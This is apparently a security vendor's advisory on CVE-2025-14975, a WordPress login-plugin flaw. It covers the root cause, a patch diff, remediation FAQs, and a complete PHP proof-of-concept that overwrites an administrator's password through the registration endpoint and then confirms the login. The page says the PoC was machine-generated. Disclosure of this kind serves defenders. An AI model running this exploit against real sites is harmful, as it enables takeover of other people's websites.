What is CVE-2025-14975?

CVE-2025-14975 is a critical unauthenticated privilege escalation vulnerability in the Custom Login Page Customizer plugin for WordPress, affecting versions up to 2.5.3. It allows attackers to change the passwords of any user, including administrators, without authentication.

How does the vulnerability work?

The vulnerability arises from the plugin’s failure to validate user identity when updating passwords. Attackers can send a POST request to the user registration endpoint, specifying an existing username and a new password, allowing them to overwrite passwords without any authentication.

Who is affected by this vulnerability?

All users of the Custom Login Page Customizer plugin for WordPress versions 2.5.3 and earlier are affected. This includes any WordPress site that has this plugin installed, particularly those with administrator accounts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Custom Login Page Customizer plugin installed. If it is version 2.5.3 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

To fix this vulnerability, update the Custom Login Page Customizer plugin to version 2.5.4 or later, where the vulnerability has been patched. Regularly check for updates to ensure your plugins are secure.

What does the CVSS score of 9.8 mean?

The CVSS score of 9.8 indicates a critical severity level, meaning the vulnerability poses a high risk of exploitation. It suggests that successful attacks could lead to complete account takeover and significant security breaches.

What are the practical risks of this vulnerability?

The practical risks include unauthorized access to WordPress accounts, especially administrators, allowing attackers to install malicious plugins, modify site content, and exfiltrate sensitive data. This could lead to full control of the WordPress site.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a crafted registration request to the WordPress site. This request includes an existing administrator’s username and a new password, successfully changing the password without authentication.

What should I do if my site has been compromised?

If your site has been compromised, immediately change passwords for all accounts, especially administrators, and check for unauthorized changes. Consider restoring from a backup and conducting a security audit to identify and remediate any further vulnerabilities.

Are there any additional security measures I should take?

In addition to updating plugins, consider implementing strong password policies, enabling two-factor authentication, and regularly monitoring user activity. Keeping WordPress core and all plugins updated is essential for maintaining site security.

How can I stay informed about vulnerabilities?

Stay informed by subscribing to security mailing lists, following WordPress security blogs, and regularly checking the National Vulnerability Database (NVD) for updates on vulnerabilities affecting WordPress plugins.

What is the significance of the patch in version 2.5.4?

The patch in version 2.5.4 removes the vulnerable password setting function and ensures that password changes are only processed during legitimate user registration flows. This includes proper sanitization and validation, significantly mitigating the risk of exploitation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14975: Custom Login Page Customizer <= 2.5.3 – Unauthenticated Privilege Escalation via Password Reset (login-customizer)

CVE ID CVE-2025-14975

Plugin login-customizer

Severity Critical (CVSS 9.8)

CWE 269

Vulnerable Version 2.5.3

Patched Version 2.5.4

Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14975:
This vulnerability is an unauthenticated privilege escalation via password reset in the Custom Login Page Customizer WordPress plugin. The affected component is the user registration and password handling functionality. The CVSS 9.8 score reflects the critical severity of this account takeover vulnerability.

The root cause lies in the plugin’s improper handling of user-supplied passwords during registration. The vulnerable function `logincust_set_password()` in `/login-customizer/src/Settings/Features/Custom_Register_Password.php` directly accepted the `user_pass` POST parameter without proper validation or authorization checks. This function was hooked to the `random_password` filter, allowing attackers to set arbitrary passwords for new user registrations. The plugin failed to verify the requesting user’s identity before processing password changes.

Exploitation occurs through the WordPress user registration endpoint. Attackers send a POST request to `/wp-login.php?action=register` containing malicious `user_pass` and `user_login` parameters. By specifying an existing administrator’s username in the `user_login` field and a new password in the `user_pass` field, the attacker triggers the vulnerable `logincust_set_password()` function. This overwrites the administrator’s password without requiring authentication or confirmation.

The patch removes the vulnerable `logincust_set_password()` function entirely and modifies the `update_default_password_nag()` function. In version 2.5.4, the plugin no longer hooks into the `random_password` filter. Instead, it directly calls `wp_set_password()` within `update_default_password_nag()` only after user creation completes. The patch adds proper sanitization with `sanitize_text_field()` and `wp_unslash()` before processing the password. This ensures password changes occur only during legitimate user registration flows.

Successful exploitation enables complete account takeover of any WordPress user, including administrators. Attackers gain full control over the compromised WordPress site, allowing them to install malicious plugins, modify themes, exfiltrate sensitive data, or establish persistent backdoors. This vulnerability bypasses all authentication mechanisms and represents a complete privilege escalation chain from unauthenticated to administrator access.

Differential between vulnerable and patched code

Code Diff

--- a/login-customizer/login-customizer.php
+++ b/login-customizer/login-customizer.php
@@ -3,8 +3,9 @@
 * Plugin Name: 			Custom Login Page Customizer
 * Plugin URI: 			https://loginpress.pro/?utm_source=login-customizer-lite&utm_medium=plugin-url-link
 * Description: 			Custom Login Customizer plugin allows you to easily customize your login page straight from your WordPress Customizer! Awesome, right?
-* Version: 				2.5.3
-* Requires at least: 	5.0
+* Version: 				2.5.4
+* Requires at least: 	4.0
+* Tested up to:         6.9
 * Requires PHP:      	5.6
 * Author: 				Hardeep Asrani
 * Author URI: 			https://loginpress.pro/?utm_source=login-customizer-lite&utm_medium=author-url-link
--- a/login-customizer/src/Essentials.php
+++ b/login-customizer/src/Essentials.php
@@ -15,7 +15,7 @@
  * Constant class.
  *
  * @since  2.2.0
- * @version 2.2.0
+ * @version 2.5.4
  * @access public
  */

@@ -26,7 +26,7 @@
 	 *
 	 * @var string
 	 */
-	public $version = '2.5.3-beta';
+	public $version = '2.5.4';

 	/**
 	 * Class Essentials construct
--- a/login-customizer/src/Settings/Features/Custom_Register_Password.php
+++ b/login-customizer/src/Settings/Features/Custom_Register_Password.php
@@ -6,6 +6,7 @@
 *
 * @package Login Customizer
 * @since 2.2.0
+* @version 2.5.4
 */

 namespace LoginCustomizerSettingsFeatures;
@@ -30,7 +31,6 @@

 		add_action( 'register_form',                  array( $this, 'logincust_reg_password_fields' ) );
 		add_filter( 'registration_errors',            array( $this, 'logincust_reg_pass_errors' ), 10, 3 );
-		add_filter( 'random_password',                array( $this, 'logincust_set_password' ) );
 		add_action( 'register_new_user',              array( $this, 'update_default_password_nag' ) );
 		add_filter( 'wp_new_user_notification_email', array( $this, 'logincust_new_user_email_notification' ) );
     }
@@ -90,36 +90,23 @@
     }

     /**
-    * Let's set the user password.
-    *
-    * @access public
-	* @param string $password Auto-generated password passed in from filter.
-	*
-	* @since 2.2.0
-    * @return string Password Choose by User.
-    */
-    public function logincust_set_password( $password ) {
-
-		// Make sure password field isn't empty.
-		if ( ! empty( $_POST['user_pass'] ) ) {
-			$password = $_POST['user_pass'];
-		}
-
-		return $password;
-    }
-
-    /**
     * Sets the value of default password nag.
     *
     * @access public
 	* @param int $user_id.
 	*
 	* @since 2.2.0
+	* @version 2.5.4
+	* @return void
     */
     public function update_default_password_nag( $user_id ) {

 		// False => User not using WordPress default password.
 		update_user_meta( $user_id, 'default_password_nag', false );
+		if ( isset( $_POST['user_pass'] ) && ! empty( $_POST['user_pass'] ) ) {
+			$password = sanitize_text_field( wp_unslash( $_POST['user_pass'] ) );
+			wp_set_password( $password, $user_id );
+		}
     }

     /**

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14975 - Custom Login Page Customizer <= 2.5.3 - Unauthenticated Privilege Escalation via Password Reset

<?php

$target_url = "https://vulnerable-wordpress-site.com"; // CHANGE THIS
$target_user = "administrator"; // Target username to compromise
$new_password = "AtomicEdgeP0C!"; // Password to set for target user

// WordPress registration endpoint
$register_url = $target_url . "/wp-login.php?action=register";

// Craft malicious registration request
$post_data = array(
    'user_login' => $target_user, // Existing admin username
    'user_pass' => $new_password, // Password to set
    'wp-submit' => 'Register',
    'redirect_to' => ''
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $register_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Add headers to mimic legitimate browser request
$headers = array(
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Content-Type: application/x-www-form-urlencoded',
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

// Execute the attack
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for success indicators
if ($http_code == 200) {
    // Look for registration success messages or redirects
    if (strpos($response, 'Registration complete') !== false || 
        strpos($response, 'wp-admin') !== false ||
        strpos($response, 'loginform') === false) {
        echo "[+] SUCCESS: Password for user '$target_user' may have been changed.n";
        echo "[+] Try logging in with password: $new_passwordn";
    } else {
        echo "[-] Attack may have failed. Check response for errors.n";
    }
} else {
    echo "[-] HTTP Error: $http_coden";
}

curl_close($ch);

// Optional: Test the new credentials
$login_url = $target_url . "/wp-login.php";
$login_data = array(
    'log' => $target_user,
    'pwd' => $new_password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . "/wp-admin/"
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); // Don't follow to see redirect
curl_setopt($ch, CURLOPT_HEADER, true); // Get headers to check for Set-Cookie
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code == 302 || $http_code == 303) {
    if (strpos($response, 'Set-Cookie: wordpress_logged_in') !== false) {
        echo "[+] CONFIRMED: Successfully logged in as '$target_user' with new password!n";
    }
} else {
    echo "[-] Login test failed. Account may not be compromised.n";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-14975?
Overview of the vulnerability
CVE-2025-14975 is a critical unauthenticated privilege escalation vulnerability in the Custom Login Page Customizer plugin for WordPress, affecting versions up to 2.5.3. It allows attackers to change the passwords of any user, including administrators, without authentication.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the plugin’s failure to validate user identity when updating passwords. Attackers can send a POST request to the user registration endpoint, specifying an existing username and a new password, allowing them to overwrite passwords without any authentication.
Who is affected by this vulnerability?
Identifying vulnerable users
All users of the Custom Login Page Customizer plugin for WordPress versions 2.5.3 and earlier are affected. This includes any WordPress site that has this plugin installed, particularly those with administrator accounts.
How can I check if my site is vulnerable?
Assessing your WordPress installation
To check if your site is vulnerable, verify the version of the Custom Login Page Customizer plugin installed. If it is version 2.5.3 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Steps to mitigate the issue
To fix this vulnerability, update the Custom Login Page Customizer plugin to version 2.5.4 or later, where the vulnerability has been patched. Regularly check for updates to ensure your plugins are secure.
What does the CVSS score of 9.8 mean?
Understanding severity ratings
The CVSS score of 9.8 indicates a critical severity level, meaning the vulnerability poses a high risk of exploitation. It suggests that successful attacks could lead to complete account takeover and significant security breaches.
What are the practical risks of this vulnerability?
Potential impacts on your site
The practical risks include unauthorized access to WordPress accounts, especially administrators, allowing attackers to install malicious plugins, modify site content, and exfiltrate sensitive data. This could lead to full control of the WordPress site.
What is the proof of concept for this vulnerability?
Demonstrating the exploitation
The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a crafted registration request to the WordPress site. This request includes an existing administrator’s username and a new password, successfully changing the password without authentication.
What should I do if my site has been compromised?
Responding to an attack
If your site has been compromised, immediately change passwords for all accounts, especially administrators, and check for unauthorized changes. Consider restoring from a backup and conducting a security audit to identify and remediate any further vulnerabilities.
Are there any additional security measures I should take?
Enhancing overall site security
In addition to updating plugins, consider implementing strong password policies, enabling two-factor authentication, and regularly monitoring user activity. Keeping WordPress core and all plugins updated is essential for maintaining site security.
How can I stay informed about vulnerabilities?
Keeping up with security updates
Stay informed by subscribing to security mailing lists, following WordPress security blogs, and regularly checking the National Vulnerability Database (NVD) for updates on vulnerabilities affecting WordPress plugins.
What is the significance of the patch in version 2.5.4?
Understanding the fix
The patch in version 2.5.4 removes the vulnerable password setting function and ensures that password changes are only processed during legitimate user registration flows. This includes proper sanitization and validation, significantly mitigating the risk of exploitation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations